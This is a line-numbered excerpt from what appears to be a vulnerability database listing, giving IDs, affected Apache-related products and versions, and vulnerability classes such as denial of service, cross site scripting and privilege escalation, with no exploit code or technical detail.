12871| [74371] Apache Standard Taglibs up to 1.2.0 memory corruption
12872| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
12873| [74174] Apache WSS4J up to 2.0.0 privilege escalation
12874| [74172] Apache ActiveMQ up to 5.5.0 Administration Console cross site scripting
12875| [69092] Apache Tomcat up to 6.0.42/7.0.54/8.0.8 HTTP Request Smuggling privilege escalation
12876| [73831] Apache Qpid up to 0.30 Access Restriction unknown vulnerability
12877| [73731] Apache XML Security unknown vulnerability
12878| [68660] Oracle BI Publisher 10.1.3.4.2/11.1.1.7 Apache Tomcat cross site scripting
12879| [73659] Apache CloudStack up to 4.3.0 Stack-Based unknown vulnerability
12880| [73593] Apache Traffic Server up to 5.1.0 denial of service
12881| [73511] Apache POI up to 3.10 Deadlock denial of service
12882| [73510] Apache Solr up to 4.3.0 cross site scripting
12883| [68447] Apache Subversion up to 1.7.18/1.8.10 mod_dav_svn Crash denial of service
12884| [68446] Apache Subversion up to 1.7.18/1.8.10 REPORT Request Crash denial of service
12885| [73173] Apache CloudStack Stack-Based unknown vulnerability
12886| [68357] Apache Struts up to 2.3.16.3 Random Number Generator cross site request forgery
12887| [73106] Apache Hadoop up to 2.4.0 Symlink privilege escalation
12888| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
12889| [72890] Apache Qpid 0.30 unknown vulnerability
12890| [72887] Apache Hive 0.13.0 File Permission privilege escalation
12891| [72878] Apache Cordova 3.5.0 cross site request forgery
12892| [72877] Apache Cordova 3.5.0 cross site request forgery
12893| [72876] Apache Cordova 3.5.0 cross site request forgery
12894| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
12895| [68065] Apache CXF up to 3.0.1 JAX-RS SAML denial of service
12896| [68064] Apache CXF up to 3.0.0 SAML Token denial of service
12897| [67913] Oracle Retail Markdown Optimization 12.0/13.0/13.1/13.2/13.4 Apache commons-beanutils-1.8.0.jar memory corruption
12898| [67912] Oracle Retail Invoice Matching up to 14.0 Apache commons-beanutils-1.8.0.jar memory corruption
12899| [67911] Oracle Retail Clearance Optimization Engine 13.3/13.4/14.0 Apache commons-beanutils-1.8.0.jar memory corruption
12900| [67910] Oracle Retail Allocation up to 13.2 Apache commons-beanutils-1.8.0.jar memory corruption
12901| [71835] Apache Shiro 1.0.0/1.1.0/1.2.0/1.2.1/1.2.2 unknown vulnerability
12902| [71633] Apachefriends XAMPP 1.8.1 cross site scripting
12903| [71629] Apache Axis2/C spoofing
12904| [67633] Apple Mac OS X up to 10.9.4 apache_mod_php ext/standard/dns.c dns_get_record memory corruption
12905| [67631] Apple Mac OS X up to 10.9.4 apache_mod_php Symlink memory corruption
12906| [67630] Apple Mac OS X up to 10.9.4 apache_mod_php cdf_read_property_info denial of service
12907| [67629] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_count_chain denial of service
12908| [67628] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_check_stream_offset denial of service
12909| [67627] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c mconvert memory corruption
12910| [67626] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c denial of service
12911| [67625] Apple Mac OS X up to 10.9.4 apache_mod_php Crash denial of service
12912| [67624] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_property_info denial of service
12913| [67623] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_unpack_summary_info denial of service
12914| [67622] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_short_sector denial of service
12915| [67620] Apple Mac OS X up to 10.9.4 apache_mod_php magic/Magdir/commands denial of service
12916| [67790] Apache HTTP Server mod_cache NULL Pointer Dereference denial of service
12917| [67522] Apache Tomcat up to 7.0.39 JSP Upload privilege escalation
12918| [70809] Apache POI up to 3.11 Crash denial of service
12919| [70808] Apache POI up to 3.10 unknown vulnerability
12920| [70806] Apache Commons-httpclient 4.2/4.2.1/4.2.2 spoofing
12921| [70749] Apache Axis up to 1.4 getCN spoofing
12922| [70701] Apache Traffic Server up to 3.3.5 denial of service
12923| [70700] Apache OFBiz up to 12.04.03 cross site scripting
12924| [67402] Apache OpenOffice 4.0.0/4.0.1/4.1.0 Calc privilege escalation
12925| [67401] Apache OpenOffice up to 4.1.0 OLE Object information disclosure
12926| [70661] Apache Subversion up to 1.6.17 denial of service
12927| [70660] Apache Subversion up to 1.6.17 spoofing
12928| [70659] Apache Subversion up to 1.6.17 spoofing
12929| [67183] Apache HTTP Server up to 2.4.9 mod_proxy denial of service
12930| [67180] Apache HTTP Server up to 2.4.9 WinNT MPM Memory Leak denial of service
12931| [67185] Apache HTTP Server up to 2.4.9 mod_status Heap-Based memory corruption
12932| [67184] Apache HTTP Server 2.4.5/2.4.6 mod_cache NULL Pointer Dereference denial of service
12933| [67182] Apache HTTP Server up to 2.4.9 mod_deflate Memory Consumption denial of service
12934| [67181] Apache HTTP Server up to 2.4.9 mod_cgid denial of service
12935| [70338] Apache Syncope up to 1.1.7 unknown vulnerability
12936| [70295] Apache CXF up to 2.7.9 Cleartext information disclosure
12937| [70106] Apache Open For Business Project up to 10.04.0 getServerError cross site scripting
12938| [70105] Apache MyFaces up to 2.1.5 JavaServer Faces directory traversal
12939| [69846] Apache HBase up to 0.94.8 information disclosure
12940| [69783] Apache CouchDB up to 1.2.0 memory corruption
12941| [13383] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 XML Parser privilege escalation
12942| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
12943| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
12944| [13164] Apache CXF up to 2.6.13/2.7.10 SOAP OutgoingChainInterceptor.java Invalid Content denial of service
12945| [13163] Apache CXF up to 2.6.13/2.7.10 SOAP HTML Content denial of service
12946| [13158] Apache Struts up to 2.3.16.2 ParametersInterceptor getClass privilege escalation
12947| [69515] Apache Struts up to 2.3.15.0 CookieInterceptor memory corruption
12948| [13086] Apache Struts up to 1.3.10 Class Loader privilege escalation
12949| [13067] Apache Struts up to 2.3.16.1 Class Loader privilege escalation
12950| [69431] Apache Archiva up to 1.3.6 cross site scripting
12951| [69385] Apache Syncope up to 1.1.6 unknown vulnerability
12952| [69338] Apache Xalan-Java up to 2.7.1 system-property unknown vulnerability
12953| [12742] Trustwave ModSecurity up to 2.7.5 Chunk Extension apache2/modsecurity.c modsecurity_tx_init privilege escalation
12954| [12741] Trustwave ModSecurity up to 2.7.6 Chunked HTTP Transfer apache2/modsecurity.c modsecurity_tx_init Trailing Header privilege escalation
12955| [13387] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Content-Length Header privilege escalation
12956| [13386] Apache Tomcat Security Manager up to 6.0.39/7.0.53/8.0.5 XSLT privilege escalation
12957| [13385] Apache Tomcat 8.0.0/8.0.1/8.0.3 AJP Request Zero Length denial of service
12958| [13384] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Chunked HTTP Request denial of service
12959| [12748] Apache CouchDB 1.5.0 UUIDS /_uuids denial of service
12960| [66739] Apache Camel up to 2.12.2 unknown vulnerability
12961| [66738] Apache Camel up to 2.12.2 unknown vulnerability
12962| [12667] Apache HTTP Server 2.4.7 mod_log_config.c log_cookie denial of service
12963| [66695] Apache CouchDB up to 1.2.0 cross site scripting
12964| [66694] Apache CouchDB up to 1.2.0 Partition partition2 directory traversal
12965| [66689] Apache HTTP Server up to 2.0.33 mod_dav dav_xml_get_cdata denial of service
12966| [12518] Apache Tomcat up to 6.0.38/7.0.49/8.0.0-RC9 HTTP Header denial of service
12967| [66498] Apache expressions up to 3.3.0 Whitelist unknown vulnerability
12968| [12781] Apache Struts up to 2.3.8 ParametersInterceptor getClass denial of service
12969| [12439] Apache Tomcat 6.0.33 XML XXE information disclosure
12970| [12438] Apache Tomcat 6.0.33/6.0.34/6.0.35/6.0.36/6.0.37 coyoteadapter.java disableURLRewriting privilege escalation
12971| [66356] Apache Wicket up to 6.8.0 information disclosure
12972| [12209] Apache Tomcat 7.0.0/7.0.50/8.0.0-RC1/8.0.1 Content-Type Header for Multi-Part Request Infinite Loop denial of service
12973| [66322] Apache ActiveMQ up to 5.8.0 cross site scripting
12974| [12291] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
12975| [66255] Apache Open For Business Project up to 10.04.3 cross site scripting
12976| [66200] Apache Hadoop up to 2.0.5 Security Feature information disclosure
12977| [66072] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
12978| [66068] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
12979| [11928] Oracle Secure Global Desktop up to 4.71 Apache Tomcat unknown vulnerability
12980| [11924] Oracle Secure Global Desktop up to 4.63 Apache Tomcat denial of service
12981| [11922] Oracle Secure Global Desktop up to 4.63 Apache Tomcat unknown vulnerability
12982| [66049] Apache XML Security for Java up to 1.4.6 Memory Consumption denial of service
12983| [12199] Apache Subversion up to 1.8.5 mod_dav_svn/repos.c get_resource denial of service
12984| [65946] askapache Firefox Adsense up to 3.0 askapache-firefox-adsense.php cross site request forgery
12985| [65668] Apache Solr 4.0.0 Updater denial of service
12986| [65665] Apache Solr up to 4.3.0 denial of service
12987| [65664] Apache Solr 3.6.0/3.6.1/3.6.2/4.0.0 Updater denial of service
12988| [65663] Apache Solr up to 4.5.1 ResourceLoader directory traversal
12989| [65658] Apache roller 4.0/4.0.1/5.0/5.0.1 unknown vulnerability
12990| [65657] Apache Roller 4.0/4.0.1/5.0/5.0.1 cross site scripting
12991| [11325] Apache Subversion 1.7.13 mod_dontdothat Bypass denial of service
12992| [11324] Apache Subversion up to 1.8.4 mod_dav_svn denial of service
12993| [11098] Apache Tomcat 5.5.25 HTTP Request cross site request forgery
12994| [65410] Apache Struts 2.3.15.3 cross site scripting
12995| [65386] Apache Solr up to 2.2.1 on TYPO3 cross site scripting
12996| [65385] Apache Solr up to 2.2.1 on TYPO3 unknown vulnerability
12997| [11044] Apache Struts 2.3.15.3 showConfig.action cross site scripting
12998| [11043] Apache Struts 2.3.15.3 actionNames.action cross site scripting
12999| [11018] cPanel WHM up to 11.40.0.11 Apache mod_userdir Tweak Interface privilege escalation
13000| [65342] Apache Sling 1.0.2/1.0.4/1.0.6/1.1.0/1.1.2 Auth Core cross site scripting
13001| [65340] Apache Shindig 2.5.0 information disclosure
13002| [65316] Apache Mod Fcgid up to 2.3.7 mod_fcgid fcgid_bucket.c fcgid_header_bucket_read memory corruption
13003| [65313] Apache Sling 2.2.0/2.3.0 AbstractCreateOperation.java deepGetOrCreateNode denial of service
13004| [10826] Apache Struts 2 File privilege escalation
13005| [65204] Apache Camel up to 2.10.1 unknown vulnerability
13006| [10460] Apache Struts 2.0.0/2.3.15.1 Action Mapping Mechanism Bypass privilege escalation
13007| [10459] Apache Struts 2.0.0/2.3.15 Dynamic Method Invocation unknown vulnerability
13008| [10160] Apache Subversion 1.8.0/1.8.1/1.8.2 svnwcsub.py handle_options race condition
13009| [10159] Apache Subversion up to 1.8.2 svnserve write_pid_file race condition
13010| [10158] Apache Subversion 1.8.0/1.8.1/1.8.2 daemonize.py daemon::daemonize race condition
13011| [10157] Apache Subversion up to 1.8.1 FSFS Repository Symlink privilege escalation
13012| [64808] Fail2ban up to 0.8.9 apache-auth.conf denial of service
13013| [64760] Best Practical RT up to 4.0.12 Apache::Session::File information disclosure
13014| [64722] Apache XML Security for C++ Heap-based memory corruption
13015| [64719] Apache XML Security for C++ Heap-based memory corruption
13016| [64718] Apache XML Security for C++ verify denial of service
13017| [64717] Apache XML Security for C++ getURIBaseTXFM memory corruption
13018| [64716] Apache XML Security for C++ spoofing
13019| [64701] Apache CXF up to 2.7.3 XML Parser Memory Consumption denial of service
13020| [64700] Apache CloudStack up to 4.1.0 Stack-Based cross site scripting
13021| [64667] Apache Open For Business Project up to 10.04.04 unknown vulnerability
13022| [64666] Apache Open For Business Project up to 10.04.04 cross site scripting
13023| [9891] Apache HTTP Server 2.2.22 suEXEC Feature .htaccess information disclosure
13024| [64509] Apache ActiveMQ up to 5.8.0 scheduled.jsp cross site scripting
13025| [9826] Apache Subversion up to 1.8.0 mod_dav_svn denial of service
13026| [9683] Apache HTTP Server 2.4.5 mod_session_dbd denial of service
13027| [64485] Apache Struts up to 2.2.3.0 privilege escalation
13028| [9568] Apache Struts up to 2.3.15 DefaultActionMapper cross site request forgery
13029| [9567] Apache Struts up to 2.3.15 DefaultActionMapper memory corruption
13030| [64467] Apache Geronimo 3.0 memory corruption
13031| [64466] Apache OpenJPA up to 2.2.1 Serialization memory corruption
13032| [64457] Apache Struts up to 2.2.3.0 cross site scripting
13033| [64326] Alejandro Garza Apachesolr Autocomplete up to 7.x-1.1 cross site scripting
13034| [9184] Apache Qpid up to 0.20 SSL misconfiguration
13035| [8935] Apache Subversion up to 1.7.9 FSFS Format Repository denial of service
13036| [8934] Apache Subversion up to 1.7.9 Svnserve Server denial of service
13037| [8933] Apache Subversion up to 1.6.21 check-mime-type.pl svnlook memory corruption
13038| [8932] Apache Subversion up to 1.6.21 svn-keyword-check.pl svnlook changed memory corruption
13039| [9022] Apache Struts up to 2.3.14.2 OGNL Expression memory corruption
13040| [8873] Apache Struts 2.3.14 privilege escalation
13041| [8872] Apache Struts 2.3.14 privilege escalation
13042| [8746] Apache HTTP Server Log File Terminal Escape Sequence Filtering mod_rewrite.c do_rewritelog privilege escalation
13043| [8666] Apache Tomcat up to 7.0.32 AsyncListener information disclosure
13044| [8665] Apache Tomcat up to 7.0.29 Chunked Transfer Encoding Extension Size denial of service
13045| [8664] Apache Tomcat up to 7.0.32 FORM Authentication weak authentication
13046| [64075] Apache Subversion up to 1.7.7 mod_dav_svn Crash denial of service
13047| [64074] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
13048| [64073] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
13049| [64072] Apache Subversion up to 1.7.7 mod_dav_svn NULL Pointer Dereference denial of service
13050| [64071] Apache Subversion up to 1.7.8 mod_dav_svn Memory Consumption denial of service
13051| [8768] Apache Struts up to 2.3.14 on Mac EL and OGNL Interpreter memory corruption
13052| [64006] Apache ActiveMQ up to 5.7.0 denial of service
13053| [64005] Apache ActiveMQ up to 5.7.0 Default Configuration denial of service
13054| [64004] Apache ActiveMQ up to 5.7.0 PortfolioPublishServlet.java cross site scripting
13055| [8427] Apache Tomcat Session Transaction weak authentication
13056| [63960] Apache Maven 3.0.4 Default Configuration spoofing
13057| [63751] Apache qpid up to 0.20 qpid::framing::Buffer denial of service
13058| [63750] Apache qpid up to 0.20 checkAvailable denial of service
13059| [63749] Apache Qpid up to 0.20 Memory Consumption denial of service
13060| [63748] Apache Qpid up to 0.20 Default Configuration denial of service
13061| [63747] Apache Rave up to 0.20 User Account information disclosure
13062| [7889] Apache Subversion up to 1.6.17 mod_dav_svn/svn_fs_file_length() denial of service
13063| [63646] Apache HTTP Server up to 2.2.23/2.4.3 mod_proxy_balancer.c balancer_handler cross site scripting
13064| [7688] Apache CXF up to 2.7.1 WSS4JInterceptor Bypass weak authentication
13065| [7687] Apache CXF up to 2.7.2 Token weak authentication
13066| [63334] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
13067| [63299] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
13068| [7202] Apache HTTP Server 2.4.2 on Oracle Solaris ld_library_path cross site scripting
13069| [7075] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector NioEndpoint.java denial of service
13070| [7074] Apache Tomcat up to 6.0.35/7.0.29 FORM Authentication RealmBase.java weak authentication
13071| [7073] Apache Tomcat up to 6.0.35/7.0.31 CSRF Prevention Filter cross site request forgery
13072| [63090] Apache Tomcat up to 4.1.24 denial of service
13073| [63089] Apache HTTP Server up to 2.2.13 mod_proxy_ajp denial of service
13074| [62933] Apache Tomcat up to 5.5.0 Access Restriction unknown vulnerability
13075| [62929] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector Memory Consumption denial of service
13076| [62833] Apache CXF -/2.6.0 spoofing
13077| [62832] Apache Axis2 up to 1.6.2 spoofing
13078| [62831] Apache Axis up to 1.4 Java Message Service spoofing
13079| [62830] Apache Commons-httpclient 3.0 Payments spoofing
13080| [62826] Apache Libcloud up to 0.11.0 spoofing
13081| [62757] Apache Open For Business Project up to 10.04.0 unknown vulnerability
13082| [8830] Red Hat JBoss Enterprise Application Platform 6.0.1 org.apache.catalina.connector.Response.encodeURL information disclosure
13083| [62661] Apache Axis2 unknown vulnerability
13084| [62658] Apache Axis2 unknown vulnerability
13085| [62467] Apache Qpid up to 0.17 denial of service
13086| [62417] Apache CXF 2.4.7/2.4.8/2.5.3/2.5.4/2.6.1 spoofing
13087| [6301] Apache HTTP Server mod_pagespeed cross site scripting
13088| [6300] Apache HTTP Server mod_pagespeed Hostname information disclosure
13089| [6123] Apache Wicket up to 1.5.7 Ajax Link cross site scripting
13090| [62035] Apache Struts up to 2.3.4 denial of service
13091| [61916] Apache QPID 0.5/0.6/0.14/0.16 unknown vulnerability
13092| [6998] Apache Tomcat 5.5.35/6.0.35/7.0.28 DIGEST Authentication Session State Caching privilege escalation
13093| [6997] Apache Tomcat 5.5.35/6.0.35/7.0.28 HTTP Digest Authentication Implementation privilege escalation
13094| [6092] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_ajp.c information disclosure
13095| [6090] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_http.c information disclosure
13096| [61507] Apache POI up to 3.8 UnhandledDataStructure denial of service
13097| [6070] Apache Struts up to 2.3.4 Token Name Configuration Parameter privilege escalation
13098| [6069] Apache Struts up to 2.3.4 Request Parameter OGNL Expression denial of service
13099| [5764] Oracle Solaris 10 Apache HTTP Server information disclosure
13100| [5700] Oracle Secure Backup 10.3.0.3/10.4.0.1 Apache denial of service
13101| [61255] Apache Hadoop 2.0.0 Kerberos unknown vulnerability
13102| [61229] Apache Sling up to 2.1.1 denial of service
13103| [61152] Apache Commons-compress 1.0/1.1/1.2/1.3/1.4 denial of service
13104| [61094] Apache Roller up to 5.0 cross site scripting
13105| [61093] Apache Roller up to 5.0 cross site request forgery
13106| [61005] Apache OpenOffice 3.3/3.4 unknown vulnerability
13107| [9673] Apache HTTP Server up to 2.4.4 mod_dav mod_dav.c Request denial of service
13108| [5436] Apache OpenOffice 3.3/3.4 WPXContentListener.cpp _closeTableRow File memory corruption
13109| [5435] Apache OpenOffice 3.3/3.4 vclmi.dll File memory corruption
13110| [60730] PHP 5.4.0/5.4.1/5.4.2 apache_request_headers memory corruption
13111| [60708] Apache Qpid 0.12 unknown vulnerability
13112| [5032] Apache Hadoop up to 0.20.205.0/1.0.1/0.23.1 Kerberos/MapReduce Security Feature privilege escalation
13113| [4949] Apache Struts File Upload XSLTResult.java XSLT File privilege escalation
13114| [4955] Apache Traffic Server 3.0.3/3.1.2 HTTP Header Parser memory corruption
13115| [4882] Apache Wicket up to 1.5.4 directory traversal
13116| [4881] Apache Wicket up to 1.4.19 cross site scripting
13117| [4884] Apache HTTP Server up to 2.3.6 mod_fcgid fcgid_spawn_ctl.c FcgidMaxProcessesPerClass HTTP Requests denial of service
13118| [60352] Apache Struts up to 2.2.3 memory corruption
13119| [60153] Apache Portable Runtime up to 1.4.3 denial of service
13120| [4598] Apache Struts 1.3.10 upload-submit.do cross site scripting
13121| [4597] Apache Struts 1.3.10 processSimple.do cross site scripting
13122| [4596] Apache Struts 2.0.14/2.2.3 struts2-rest-showcase/orders cross site scripting
13123| [4595] Apache Struts 2.0.14/2.2.3 struts2-showcase/person/editPerson.action cross site scripting
13124| [4583] Apache HTTP Server up to 2.2.21 Threaded MPM denial of service
13125| [4582] Apache HTTP Server up to 2.2.21 protocol.c information disclosure
13126| [4571] Apache Struts up to 2.3.1.2 privilege escalation
13127| [4557] Apache Tomcat up to 7.0.21 Caching/Recycling information disclosure
13128| [59934] Apache Tomcat up to 6.0.9 DigestAuthenticator.java unknown vulnerability
13129| [59933] Apache Tomcat up to 6.0.9 Access Restriction unknown vulnerability
13130| [59932] Apache Tomcat up to 6.0.9 unknown vulnerability
13131| [59931] Apache Tomcat up to 6.0.9 Access Restriction information disclosure
13132| [59902] Apache Struts up to 2.2.3 Interfaces unknown vulnerability
13133| [4528] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
13134| [4527] Apache Struts up to 2.2.3 ExceptionDelegator cross site scripting
13135| [59888] Apache Tomcat up to 6.0.6 denial of service
13136| [59886] Apache ActiveMQ up to 5.5.1 Crash denial of service
13137| [4513] Apache Struts up to 2.3.1 ParameterInterceptor directory traversal
13138| [4512] Apache Struts up to 2.2.3 CookieInterceptor privilege escalation
13139| [59850] Apache Geronimo up to 2.2.1 denial of service
13140| [59825] Apache HTTP Server up to 2.1.7 mod_reqtimeout denial of service
13141| [59556] Apache HTTP Server up to 2.0.53 mod_proxy information disclosure
13142| [58467] Apache libcloud 0.2.0/0.3.0/0.3.1/0.4.0 Access Restriction spoofing
13143| [58413] Apache Tomcat up to 6.0.10 spoofing
13144| [58381] Apache Wicket up to 1.4.17 cross site scripting
13145| [58296] Apache Tomcat up to 7.0.19 unknown vulnerability
13146| [57888] Apache HttpClient 4.0/4.0.1/4.1 Authorization information disclosure
13147| [57587] Apache Subversion up to 1.6.16 mod_dav_svn information disclosure
13148| [57585] Apache Subversion up to 1.6.16 mod_dav_svn Memory Consumption denial of service
13149| [57584] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
13150| [57577] Apache Rampart-C 1.3.0 Access Restriction rampart_timestamp_token_validate privilege escalation
13151| [57568] Apache Archiva up to 1.3.4 cross site scripting
13152| [57567] Apache Archiva up to 1.3.4 cross site request forgery
13153| [57481] Apache Tomcat 7.0.12/7.0.13 Access Restriction unknown vulnerability
13154| [4355] Apache HTTP Server APR apr_fnmatch denial of service
13155| [57435] Apache Struts up to 2.2.1.1 FileHandler.java cross site scripting
13156| [57425] Apache Struts up to 2.2.1.1 cross site scripting
13157| [4352] Apache HTTP Server 2.2.x APR apr_fnmatch denial of service
13158| [57025] Apache Tomcat up to 7.0.11 information disclosure
13159| [57024] Apache Tomcat 7.0.11 Access Restriction information disclosure
13160| [56774] IBM WebSphere Application Server up to 7.0.0.14 org.apache.jasper.runtime.JspWriterImpl.response denial of service
13161| [56824] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
13162| [56832] Apache Tomcat up to 7.0.10 Access Restriction information disclosure
13163| [56830] Apache Tomcat up to 7.0.9 Access Restriction privilege escalation
13164| [12440] Apache Tomcat 6.0.33 Malicious Request cross site scripting
13165| [56512] Apache Continuum up to 1.4.0 cross site scripting
13166| [4285] Apache Tomcat 5.x JVM getLocale denial of service
13167| [4284] Apache Tomcat 5.x HTML Manager Infinite Loop cross site scripting
13168| [4283] Apache Tomcat 5.x ServletContect privilege escalation
13169| [56441] Apache Tomcat up to 7.0.6 denial of service
13170| [56300] Apache CouchDB up to 1.0.1 Web Administration Interface cross site scripting
13171| [55967] Apache Subversion up to 1.6.4 rev_hunt.c denial of service
13172| [55966] Apache Subversion up to 1.6.4 mod_dav_svn repos.c walk denial of service
13173| [55095] Apache Axis2 up to 1.6 Default Password memory corruption
13174| [55631] Apache Archiva up to 1.3.1 User Account cross site request forgery
13175| [55556] Apache Tomcat up to 6.0.29 Default Configuration information disclosure
13176| [55553] Apache Tomcat up to 7.0.4 sessionsList.jsp cross site scripting
13177| [55162] Apache MyFaces up to 2.0.0 Authentication Code unknown vulnerability
13178| [54881] Apache Subversion up to 1.6.12 mod_dav_svn authz.c privilege escalation
13179| [54879] Apache APR-util up to 0.9.14 mod_reqtimeout apr_brigade_split_line denial of service
13180| [54693] Apache Traffic Server DNS Cache unknown vulnerability
13181| [54416] Apache CouchDB up to 0.11.0 cross site request forgery
13182| [54394] Apache CXF up to 2.2.8 Memory Consumption denial of service
13183| [54261] Apache Tomcat jsp/cal/cal2.jsp cross site scripting
13184| [54166] Apache HTTP Server up to 2.2.12 mod_cache Crash denial of service
13185| [54385] Apache Struts up to 2.1.8.1 ParameterInterceptor unknown vulnerability
13186| [54012] Apache Tomcat up to 6.0.10 denial of service
13187| [53763] Apache Axis2 1.3/1.4/1.4.1/1.5/1.5.1 Memory Consumption denial of service
13188| [53368] Apache MyFaces 1.1.7/1.2.8 cross site scripting
13189| [53397] Apache axis2 1.4.1/1.5.1 Administration Console cross site scripting
13190| [52894] Apache Tomcat up to 6.0.7 information disclosure
13191| [52960] Apache ActiveMQ up to 5.4-snapshot information disclosure
13192| [52843] Apache HTTP Server mod_auth_shadow unknown vulnerability
13193| [52786] Apache Open For Business Project up to 09.04 cross site scripting
13194| [52587] Apache ActiveMQ up to 5.3.0 cross site request forgery
13195| [52586] Apache ActiveMQ up to 5.3.0 cross site scripting
13196| [52584] Apache CouchDB up to 0.10.1 information disclosure
13197| [51757] Apache HTTP Server 2.0.44 cross site scripting
13198| [51756] Apache HTTP Server 2.0.44 spoofing
13199| [51717] Apache HTTP Server up to 1.3.3 mod_proxy ap_proxy_send_fb memory corruption
13200| [51690] Apache Tomcat up to 6.0 directory traversal
13201| [51689] Apache Tomcat up to 6.0 information disclosure
13202| [51688] Apache Tomcat up to 6.0 directory traversal
13203| [50886] HP Operations Manager 8.10 on Windows File Upload org.apache.catalina.manager.HTMLManagerServlet memory corruption
13204| [50802] Apache Tomcat up to 3.3 Default Password weak authentication
13205| [50626] Apache Solr 1.0.0 cross site scripting
13206| [49857] Apache HTTP Server mod_proxy_ftp cross site scripting
13207| [49856] Apache HTTP Server 2.2.13 mod_proxy_ftp ap_proxy_ftp_handler denial of service
13208| [49348] Apache Xerces-C++ 2.7.0 Stack-Based denial of service
13209| [86789] Apache Portable Runtime memory/unix/apr_pools.c unknown vulnerability
13210| [49283] Apache APR-util up to 1.3.8 apr-util misc/apr_rmm.c apr_rmm_realloc memory corruption
13211| [48952] Apache HTTP Server up to 1.3.6 mod_deflate denial of service
13212| [48626] Apache Tomcat up to 4.1.23 Access Restriction directory traversal
13213| [48431] Apache Tomcat up to 4.1.23 j_security_check cross site scripting
13214| [48430] Apache Tomcat up to 4.1.23 mod_jk denial of service
13215| [47801] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site request forgery
13216| [47800] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site scripting
13217| [47799] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console directory traversal
13218| [47648] Apache Tiles 2.1.0/2.1.1 cross site scripting
13219| [47640] Apache Struts 2.0.6/2.0.8/2.0.9/2.0.11/2.1 cross site scripting
13220| [47638] Apache Tomcat up to 4.1.23 mod_jk information disclosure
13221| [47636] Apache Struts 2.0.9 xip_client.html cross site scripting
13222| [47593] Apache Mod Perl 1 perl-status Apache::Status cross site scripting
13223| [47637] Apache Struts 1.0.2/1.1/1.2.4/1.2.7/1.2.8 cross site scripting
13224| [47239] Apache Struts up to 2.1.2 Beta struts directory traversal
13225| [47214] Apachefriends xampp 1.6.8 spoofing
13226| [47213] Apachefriends xampp 1.6.8 htaccess cross site request forgery
13227| [47162] Apachefriends XAMPP 1.4.4 weak authentication
13228| [47065] Apache Tomcat 4.1.23 cross site scripting
13229| [46834] Apache Tomcat up to 5.5.20 cross site scripting
13230| [46004] Apache Jackrabbit 1.4/1.5.0 search.jsp cross site scripting
13231| [49205] Apache Roller 2.3/3.0/3.1/4.0 Search cross site scripting
13232| [86625] Apache Struts directory traversal
13233| [44461] Apache Tomcat up to 5.5.0 information disclosure
13234| [44389] Apache Xerces-C++ XML Parser Memory Consumption denial of service
13235| [44352] Apache Friends XAMPP 1.6.8 adodb.php cross site scripting
13236| [43663] Apache Tomcat up to 6.0.16 directory traversal
13237| [43612] Apache Friends XAMPP 1.6.7 iart.php cross site scripting
13238| [43556] Apache HTTP Server up to 2.1.8 mod_proxy_ftp proxy_ftp.c cross site scripting
13239| [43516] Apache Tomcat up to 4.1.20 directory traversal
13240| [43509] Apache Tomcat up to 6.0.13 cross site scripting
13241| [42637] Apache Tomcat up to 6.0.16 cross site scripting
13242| [42325] Apache HTTP Server up to 2.1.8 Error Page cross site scripting
13243| [41838] Apache-SSL 1.3.34 1.57 expandcert privilege escalation
13244| [41091] Apache Software Foundation Mod Jk up to 2.0.1 mod_jk2 Stack-based memory corruption
13245| [40924] Apache Tomcat up to 6.0.15 information disclosure
13246| [40923] Apache Tomcat up to 6.0.15 unknown vulnerability
13247| [40922] Apache Tomcat up to 6.0 information disclosure
13248| [40710] Apache HTTP Server up to 2.0.61 mod_negotiation cross site scripting
13249| [40709] Apache HTTP Server up to 2.0.53 mod_negotiation cross site scripting
13250| [40656] Apache Tomcat 5.5.20 information disclosure
13251| [40503] Apache HTTP Server mod_proxy_ftp cross site scripting
13252| [40502] Apache HTTP Server up to 2.2.5 mod_proxy_balancer memory corruption
13253| [40501] Apache HTTP Server 2.2.6 mod_proxy_balancer cross site request forgery
13254| [40398] Apache HTTP Server up to 2.2 mod_proxy_balancer cross site scripting
13255| [40397] Apache HTTP Server up to 2.2 mod_proxy_balancer balancer_handler denial of service
13256| [40234] Apache Tomcat up to 6.0.15 directory traversal
13257| [40221] Apache HTTP Server 2.2.6 information disclosure
13258| [40027] David Castro Apache Authcas 0.4 sql injection
13259| [3495] Apache OpenOffice up to 2.3 Database Document Processor unknown vulnerability
13260| [3489] Apache HTTP Server 2.x HTTP Header cross site scripting
13261| [3414] Apache Tomcat WebDAV Stored privilege escalation
13262| [39489] Apache Jakarta Slide up to 2.1 directory traversal
